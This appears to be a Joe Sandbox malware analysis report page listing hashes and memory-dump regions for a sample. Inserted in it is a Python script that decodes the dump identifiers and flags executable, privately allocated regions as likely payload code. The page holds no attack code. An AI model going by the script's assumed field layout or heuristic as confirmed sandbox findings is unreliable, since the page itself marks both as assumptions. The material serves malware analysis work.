                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd6f8163ae83dee8151f0ce108fd43bfefa6287ebb70156a77c0600a50f6d491
                        • Instruction ID: 19e677d5043ebe896550cfeab49ade6fe74d0890315f3e5061b06810b2f17885
                        • Opcode Fuzzy Hash: cd6f8163ae83dee8151f0ce108fd43bfefa6287ebb70156a77c0600a50f6d491
                        • Instruction Fuzzy Hash: 90F1343164874A4FC736DFBDD8C04A6BBA3AFCD208F09C678D9944B35AE97152198781
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fe0346e0e1ffcfb84c3d38ca692f08383ab7c477b75f3983180f34f0fd38e5d
                        • Instruction ID: 0784eab2f4340d99a7814d5a9078ab1012fb816167f9dfb3e1f9ea7210df6123
                        • Opcode Fuzzy Hash: 8fe0346e0e1ffcfb84c3d38ca692f08383ab7c477b75f3983180f34f0fd38e5d
                        • Instruction Fuzzy Hash: F5E10CB1026F799AC7C3DEB09154C45E765BF592893081E86C824CF912EB3FE18FA265
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3a804e0166edb61745503f3785be5ff5202385af42f3981eed734d128f9834cf
                        • Instruction ID: 62b6b0c07fad201234ca0dcba20589ca492c7068ebba41e41971c1ef2951ddbe
                        • Opcode Fuzzy Hash: 3a804e0166edb61745503f3785be5ff5202385af42f3981eed734d128f9834cf
                        • Instruction Fuzzy Hash: 9102F774A083858FDB68CF19C480B9AB7E1FF88304F15896EE989DB355D730A941CF91
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2be2d440afd9e811bd95f18512eafd0f966ded2a3273f229b2213fcd8b20c490
                        • Instruction ID: 6c9a6f91e779a665129f3d612b1d8bde34483a04afa1e91aae20990344b10d19
                        • Opcode Fuzzy Hash: 2be2d440afd9e811bd95f18512eafd0f966ded2a3273f229b2213fcd8b20c490
                        • Instruction Fuzzy Hash: 24D19D76A087558FD328CF29C89062AF7E1FFC8301F16493DE995DB351D674E9018B82
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ed9e8d1284ad5be4cc10c915b20efac74cd7c2b4a26d716462fa7d491990df6
                        • Instruction ID: 77c8faeba776f75850a3f291fd71f8b97a0d8a4afe86ae1540335b849c17a7b7
                        • Opcode Fuzzy Hash: 4ed9e8d1284ad5be4cc10c915b20efac74cd7c2b4a26d716462fa7d491990df6
                        • Instruction Fuzzy Hash: C8E1B3B5600A018FD368CF19D490A16FBE1EF89350B25C96ED5DACB761D731E886CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9dc69d32acad756350df59f436e0504325e81e234160687910c621cc66f1bcd5
                        • Instruction ID: 3fa7b330c25a561891d927e100983ad34d0b47c34fd16de5dbd7e74a9a492d2f
                        • Opcode Fuzzy Hash: 9dc69d32acad756350df59f436e0504325e81e234160687910c621cc66f1bcd5
                        • Instruction Fuzzy Hash: 50D17CB6A187568FD315CE2AC88062AF7E1FFC8341F1A493DE995DB351D774E8018B82
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bf13fc9bfe519dff7555e92222958fb462546851ec426a97731e1f0899d58e5
                        • Instruction ID: 296db0d046909409f0e03f135d7ce234a87be7bb309b09eb5179fee5b75faad6
                        • Opcode Fuzzy Hash: 1bf13fc9bfe519dff7555e92222958fb462546851ec426a97731e1f0899d58e5
                        • Instruction Fuzzy Hash: FCD167326086874ED716CF7ECC94595FF93AFCA20971FC6B4C48C4F26BE971A11A8680
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 228636626e3b905dff2ba408d546a6e78caad57fa1a2703f99d3ac68be30c72b
                        • Instruction ID: fc772790e9a1cfbf6cdbac259929337924a85306fb8f40bddc0f14c3ee5491f6
                        • Opcode Fuzzy Hash: 228636626e3b905dff2ba408d546a6e78caad57fa1a2703f99d3ac68be30c72b
                        • Instruction Fuzzy Hash: 6DD165326086874ED716CF7ECC94595BB93AFCA209B1FC6B4C58C4F26BD971A11E8280
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8328b892b5ab3c75d729ae94b34d91f2750ccd95208f7e863f327be10d0e05fd
                        • Instruction ID: 689a3beb6dea7f77332ecdcfb25b5746ec985fc044ecbb6cbb4f852942804c69
                        • Opcode Fuzzy Hash: 8328b892b5ab3c75d729ae94b34d91f2750ccd95208f7e863f327be10d0e05fd
                        • Instruction Fuzzy Hash: D3D1E431A083518FC718CF2CD49025AFBE1EB89310F198A7DE9DA97352C730EA55CB85
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e10a522e683acab63c6c8111fd1ea1b8315e4f16bbd2555d1d7ff925f840175
                        • Instruction ID: e8c8f1c123c2da6e695d936f1cc256dc599909394000988f0a21a4ad30301737
                        • Opcode Fuzzy Hash: 5e10a522e683acab63c6c8111fd1ea1b8315e4f16bbd2555d1d7ff925f840175
                        • Instruction Fuzzy Hash: 09D14933D0C5A24BD729CB3D8954456FFE35FC9208B0FC6F9C89D6B25AD962990A82C4
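The dump identifiers in the Memory Dump Source block are worth reading rather than skipping: each one carries the region's base address and its page protection, so they tell you which dump holds the executable code of the module at 0x10000000, which dump is read-only data, and which region is both writable and executable. The following Python is an added example written for this page, not code from Joe Sandbox; the field layout it assumes for the `.sdmp` names (process, run, dump id, base address, protect, state, type, reserved) is inferred from the identifiers on this page and is an assumption, while the `PAGE_*` and `MEM_*` values are the documented Windows constants. The sample input is the seven identifiers copied from the block above.

```python
"""Decode the Joe Sandbox memory-dump identifiers from this report into region metadata."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows memory constants from winnt.h (documented values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Eight dot-separated hex fields followed by ".sdmp". The meaning assigned to the
# fields below (process, run, dump id, base, protect, state, type, reserved) is an
# ASSUMPTION inferred from the identifiers on this page, not a documented format.
SDMP_RE = re.compile(r"((?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp")


@dataclass(frozen=True)
class Region:
    proc: int
    base: int
    protect: str
    state: str
    mem_type: str

    @property
    def executable(self) -> bool:
        return self.protect.startswith("PAGE_EXECUTE")

    @property
    def writable(self) -> bool:
        return self.protect in {
            "PAGE_READWRITE", "PAGE_WRITECOPY",
            "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY",
        }


def parse_sdmp(name: str) -> Region:
    """Decode one identifier; trailing page residue such as 'Download File' is ignored."""
    m = SDMP_RE.search(name)
    if m is None:
        raise ValueError(f"no .sdmp identifier in {name!r}")
    f = m.group(1).split(".")
    protect = int(f[4], 16)
    return Region(
        proc=int(f[0], 16),
        base=int(f[3], 16),
        # Mask off PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE modifier bits.
        protect=PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:X}"),
        state=MEM_STATE.get(int(f[5], 16), f[5]),
        mem_type=MEM_TYPE.get(int(f[6], 16), f[6]),
    )


def regions_in(report_text: str) -> list[Region]:
    """All distinct dump regions referenced in a slice of report text, sorted by base."""
    found = {parse_sdmp(m.group(0)) for m in SDMP_RE.finditer(report_text)}
    return sorted(found, key=lambda r: r.base)


def flag_code_regions(regions: list[Region]) -> list[Region]:
    """Analyst heuristic (an assumption, not a sandbox verdict): executable pages that
    are writable, or that are not MEM_IMAGE (so were not mapped by the image loader),
    are where unpacked or manually mapped payload code usually lives."""
    return [r for r in regions if r.executable and (r.writable or r.mem_type != "MEM_IMAGE")]


def describe(r: Region) -> str:
    tag = "  <-- executable, inspect first" if flag_code_regions([r]) else ""
    return f"proc {r.proc} base 0x{r.base:08X} {r.protect} {r.state} {r.mem_type}{tag}"


# Constructed input: the seven identifiers copied from the Memory Dump Source block above.
REPORT_EXCERPT = """
• Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
"""

if __name__ == "__main__":
    for region in regions_in(REPORT_EXCERPT):
        print(describe(region))
```

Run against the block above, the decoder reports 0x10001000 (image base + 0x1000, the usual first-section RVA) as PAGE_EXECUTE_READ, 0x1006E000 as PAGE_READONLY, 0x100FA000 as PAGE_EXECUTE_READWRITE, and every region as MEM_COMMIT / MEM_PRIVATE rather than MEM_IMAGE. Under the heuristic in `flag_code_regions` the two executable dumps are the ones to open first; the private (not image-mapped) type is consistent with code that was written into allocated memory rather than loaded from a file, though that reading is the analyst's, not the report's.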
                        Similarity
                        • Opcode ID: 002d47f4efec9b3cc6eea7946e267589eb2051cb5be7b3cde6ebfe51c014f23c
                        • Instruction ID: 6498c9314d841d58891d797f62e41e5d0f57bac15e09a042701468031222f416
                        • Opcode Fuzzy Hash: 002d47f4efec9b3cc6eea7946e267589eb2051cb5be7b3cde6ebfe51c014f23c
                        • Instruction Fuzzy Hash: B1D174326096824FC322CE7DC8C01A6FBA3BFDA206F5DC679C5844B72EDE71651E8651
                        Similarity
                        • Opcode ID: 3d9bb45b8d59035072cd650aa34955bf29322d2453f7f18fa7d136f2b77c023d
                        • Instruction ID: 653d3c4925268a1710b3f11bf463b639ef2ca6a13db73ed1047f9d5521ed1ed3
                        • Opcode Fuzzy Hash: 3d9bb45b8d59035072cd650aa34955bf29322d2453f7f18fa7d136f2b77c023d
                        • Instruction Fuzzy Hash: C5D18131839F7685E7C3AF608690C66F3A1BF9B146B070D568504C6819EF7F918FA225
                        Similarity
                        • Opcode ID: 09ce3d82e8b56d4e861340b944927da0d6c7a478fb56d545fbce004830ada262
                        • Instruction ID: fbea0946db69f39e66fe580b8b9d8c0fec87527a8ac673589de6643aa004af79
                        • Opcode Fuzzy Hash: 09ce3d82e8b56d4e861340b944927da0d6c7a478fb56d545fbce004830ada262
                        • Instruction Fuzzy Hash: DBD18131839F3685E7C39F60CA90C66F3A1BF9B186B070D568504C6919EF7F918FA225
                        Similarity
                        • Opcode ID: ad465aebc423227d95eea8f9993c516a75a572128653d888a19c5f27d0eddc25
                        • Instruction ID: 9a87920211a4e47f0e5c3d1c1c5dc2badac696daeaaead5942a3d3f5b0369b72
                        • Opcode Fuzzy Hash: ad465aebc423227d95eea8f9993c516a75a572128653d888a19c5f27d0eddc25
                        • Instruction Fuzzy Hash: 45D1502170D6C24BC329CF7D88E05A7FFE36E9A10935ED6FC85C98B65BD971A0198384
                        Similarity
                        • Opcode ID: acd13c035d0b9e1edbd6d5328106ee3ebeebac1d93fe3449b70114a1769945b1
                        • Instruction ID: aa987e04f0807c5eb8b05a7e461f2dd3f8d43d29c60d4251f498e3d138e8ec3f
                        • Opcode Fuzzy Hash: acd13c035d0b9e1edbd6d5328106ee3ebeebac1d93fe3449b70114a1769945b1
                        • Instruction Fuzzy Hash: A8C17733D085A24FD726CF7E8884595FBA35FC5206B0FC7B4CC9C5F66AD962A91982C0
                        Similarity
                        • Opcode ID: 925ae0eaa539de7ca68ca08fa616233ef49c255a8efdfe4542d76f7eaa79d7a9
                        • Instruction ID: 0cc6d9fa0c8848007dbff2c2c7e1747cb8dc64aa1531069cdd745c5cc30fa2f8
                        • Opcode Fuzzy Hash: 925ae0eaa539de7ca68ca08fa616233ef49c255a8efdfe4542d76f7eaa79d7a9
                        • Instruction Fuzzy Hash: 7FC17333E085A24FD726CF7E8894495FBA35FC5205B4FC6B4CC9C5F62AD972A91982C0
                        Similarity
                        • Opcode ID: 71e1e7bc87f417b3e139cc11ab6065613e0239f6b8b3a121980f4b8d90c4537a
                        • Instruction ID: 13deb531c3a4a776cc6ac8daaaddc935d40929954482261d98c6d8b223cf3817
                        • Opcode Fuzzy Hash: 71e1e7bc87f417b3e139cc11ab6065613e0239f6b8b3a121980f4b8d90c4537a
                        • Instruction Fuzzy Hash: 72C1E861022F3599C7C3EB709114C05F761BF9A28570A4EA6C9189F865DB3FD99FE220
                        Similarity
                        • Opcode ID: 69ce90c0fda73209490b0ce85022a5f3e9a118b93de97202b86b20a14fca784b
                        • Instruction ID: 276681fecc365bd2368b9638272cb52fd3d122bd866c202f1a2d5031f723988f
                        • Opcode Fuzzy Hash: 69ce90c0fda73209490b0ce85022a5f3e9a118b93de97202b86b20a14fca784b
                        • Instruction Fuzzy Hash: 30B12C312081824FDB1ECF7D84B49BABFE39F9A209B1FD5BD958B8F667DD1190198240
                        Similarity
                        • Opcode ID: 89088b0a3d89a42fcce83f0f84b13bbdf2bafa63eac5e5e4d67883f9874ecb02
                        • Instruction ID: 75ad954ba7e2dabccf974400cae9f5f839098c83b7231602714643af0e46e442
                        • Opcode Fuzzy Hash: 89088b0a3d89a42fcce83f0f84b13bbdf2bafa63eac5e5e4d67883f9874ecb02
                        • Instruction Fuzzy Hash: 66D168756082518FC319CF18E9D88E67BE1FFA8740B0E42F8D98A9B323D7319985CB54
                        Similarity
                        • Opcode ID: e1c713980c8454a1b17976f7535bba323c2255196cf27d942a58e5f6fbe6c6b3
                        • Instruction ID: 1679ab3b60246506abbfa693a232921ec7a5cece20c97493e03dab65f1c97ed0
                        • Opcode Fuzzy Hash: e1c713980c8454a1b17976f7535bba323c2255196cf27d942a58e5f6fbe6c6b3
                        • Instruction Fuzzy Hash: D0A13F313481C24BDB1DCF7D84B5ABABFE39F99208B1ED1BD858BCB667D911501A8344
                        Similarity
                        • Opcode ID: b52abd5ddb998c917a8aab2b878b3f56c824ddc4041ef9a8a5b6e2ec940c60b5
                        • Instruction ID: a272f327d3efecb37d0cbe53c4316909875b3d00963d3fa1b7a998d6da3d6e87
                        • Opcode Fuzzy Hash: b52abd5ddb998c917a8aab2b878b3f56c824ddc4041ef9a8a5b6e2ec940c60b5
                        • Instruction Fuzzy Hash: C0B1D2315097838FDB2DDE18A57123AF7D1EF84216F1A493ED9879FA82C624E805DB42
                        Similarity
                        • Opcode ID: 7f21ebf861c5f51589506030c19d638f555ea15c3e470a3a5fc4cda9edce7fe3
                        • Instruction ID: bef0b4b273c8531c14fe24dbce0b5c29388fb68c5a212197561867a1b9026bf8
                        • Opcode Fuzzy Hash: 7f21ebf861c5f51589506030c19d638f555ea15c3e470a3a5fc4cda9edce7fe3
                        • Instruction Fuzzy Hash: 11B1D2305097828FDB2DDE18A47123AB7E1EF84216F19497FD9879FA82C634F805DB42
                        Similarity
                        • Opcode ID: aef77ef39cd4205efdff4b579157b10787e9146a50687f8639368e60947785be
                        • Instruction ID: 42fb034976d685d0e7138c9fc5dcca335354ab896c087cc01d617d1e4f7367cc
                        • Opcode Fuzzy Hash: aef77ef39cd4205efdff4b579157b10787e9146a50687f8639368e60947785be
                        • Instruction Fuzzy Hash: 21B1F7315093828FD72DEF18D4B123ABBD1EF94316F19493ED9879FA82C624E8459B42
                        Similarity
                        • Opcode ID: e086bc696ed20c6e0c9faaa36d4b58e647367139b23328bb2dddc69ce9d3483e
                        • Instruction ID: f0c14ead3ce36b9c27f8e2541568ef0a250e2fcb51098329815b58cbcf8adcf3
                        • Opcode Fuzzy Hash: e086bc696ed20c6e0c9faaa36d4b58e647367139b23328bb2dddc69ce9d3483e
                        • Instruction Fuzzy Hash: 79B1C4315093828FD72DDF18E47123AB7D1EF84216F19497FD9879FA82DA24F8059B42
                        Similarity
                        • Opcode ID: 842246c4127c8e24ecb83a8ac13e37b1e22e3c88261550d6c990d9e173fd59e9
                        • Instruction ID: d346c58f346503824bae48b0f60308513d016333e8e2da2dc1d3ba2b0ac10034
                        • Opcode Fuzzy Hash: 842246c4127c8e24ecb83a8ac13e37b1e22e3c88261550d6c990d9e173fd59e9
                        • Instruction Fuzzy Hash: 62C11434025F658AC7D3EF308160C46F3A5BF45286B184DAAC9185B512EF3FE59FD2A4
                        Similarity
                        • Opcode ID: ad23b03eca1a5e00d050e59600b7f638c5990ad4ebba03c2f9f4bc9e485730bd
                        • Instruction ID: 5f2c837f2457d124ba523f5a97e638fa9946640bdb9bd793f3f18a91a6638781
                        • Opcode Fuzzy Hash: ad23b03eca1a5e00d050e59600b7f638c5990ad4ebba03c2f9f4bc9e485730bd
                        • Instruction Fuzzy Hash: A9A1D720229F768EDBC7EE309150951E3A1BF5621F70A09AEC515DF531EB7F934EA220
                        Similarity
                        • Opcode ID: 9d4070fc6068702b0a0125c6e3afa6700605428ee7f1e5511af0d3618f73f758
                        • Instruction ID: 0ef388f920337255ade345b3545c0078b20e9fdff134efc9b438fb033f6707ae
                        • Opcode Fuzzy Hash: 9d4070fc6068702b0a0125c6e3afa6700605428ee7f1e5511af0d3618f73f758
                        • Instruction Fuzzy Hash: A7A1CA1174E2C24EC325CFBA88D46A2FFE36E9B00975ED5FC85C84F65BD5A2A01E8354
                        Similarity
                        • Opcode ID: efa3e06a4a281107545fdb4d9f4c38462683e7e08e6da24c723449aac0739a87
                        • Instruction ID: b866617caf2f0311a1a1c19a1c10906886e90242d7ce4f8d38d56ba44b427590
                        • Opcode Fuzzy Hash: efa3e06a4a281107545fdb4d9f4c38462683e7e08e6da24c723449aac0739a87
                        • Instruction Fuzzy Hash: DD9160213481D20BD72DCF7E99B96BEAFD38FCA204B1ED5BD85CB8BB67D85154098204
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 130b29a0029abff2c123212f64f286d87595528790892ab4ec130c37bf9c4591
                        • Instruction ID: ea7d0097d03d8fcadb380b71b3639336ea9d383b35b72faa186b5b10ca811b2e
                        • Opcode Fuzzy Hash: 130b29a0029abff2c123212f64f286d87595528790892ab4ec130c37bf9c4591
                        • Instruction Fuzzy Hash: 88B1F334025F658AC7D3EF708160C46F3A5BF45286B184DAAC9189B512EF3FE59FD2A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                        • Instruction ID: 737be88cceda9f45cb3c4c8a4c5bcac651c60fbd058ff5116b3c582147ab14e3
                        • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                        • Instruction Fuzzy Hash: 2FB18D75A00216DFDB15CF04C6D4AA9BBA1FB58318F14C1AEC8196B3C2C775EA46CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
